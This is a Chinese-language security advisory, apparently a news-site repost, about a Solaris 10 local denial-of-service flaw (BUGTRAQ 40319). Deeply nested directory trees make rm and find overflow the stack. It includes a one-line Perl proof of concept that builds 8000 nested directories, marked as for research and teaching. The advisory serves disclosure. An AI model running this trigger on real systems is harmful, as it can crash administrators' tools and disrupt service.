发布日期:2009-05-21
更新日期:2010-05-24受影响系统:
Sun Solaris 10.0_x86
Sun Solaris 10.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 40319Solaris是一款由Sun开发和维护的商业UNIX操作系统。本地用户可以通过对嵌套了深层目录树的文件系统执行rm(1)、find(1)等操作触发栈溢出,导致拒绝服务的情况。<*来源:Maksymilian Arciemowicz (max@jestsuper.pl)
链接:http://securityreason.com/achievement_securityalert/85
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!perl -e "$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }"建议:
--------------------------------------------------------------------------------
厂商补丁:Sun
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://sunsolve.sun.com/securitye107 BBCode任意PHP代码执行漏洞Sun Solaris多个libc库数字转换函数缓冲区溢出漏洞相关资讯 UNIX Solaris
- VMware虚拟机安装x86架构的Solaris (今 14:25)
- 一个涵盖 Unix 44 年进化史的版本 (12/23/2015 19:08:29)
- 2002年,程序员和Unix大神们的桌面 (11/10/2015 08:18:44)
| - Oracle Sun Solaris 本地安全漏洞( (04月22日)
- UNIX 家族小史 (12/01/2015 12:03:06)
- Oracle Solaris本地安全漏洞(CVE- (07/17/2015 08:32:02)
|
本文评论 查看全部评论 (0)